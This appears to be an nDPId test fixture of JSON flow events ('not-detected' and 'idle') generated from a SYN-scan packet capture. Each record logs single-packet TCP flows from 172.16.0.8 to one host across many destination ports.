+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1794,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1863,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50006,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1863,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":616,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":616,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":947,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":947,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":681,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":681,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":623,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9050,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":623,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1008,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1008,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":674,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9050,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":674,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1440,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7004,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1440,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1506,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7004,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1506,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":416,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2909,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":416,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2909,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1680,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060968,"flow_last_seen":1278275060968,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2910,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1680,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060968,"flow_last_seen":1278275060968,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2910,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":450,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2909,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":450,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2909,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1802,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7007,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1802,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1757,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061071,"flow_last_seen":1278275061071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2910,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1757,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061071,"flow_last_seen":1278275061071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2910,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1855,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7007,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1855,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":876,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":11110,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":876,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":11110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":929,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":11110,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":929,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":11110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":498,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":11111,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":498,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":11111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1837,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2920,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1837,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2920,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":533,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":11111,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":533,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":11111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1924,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2920,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
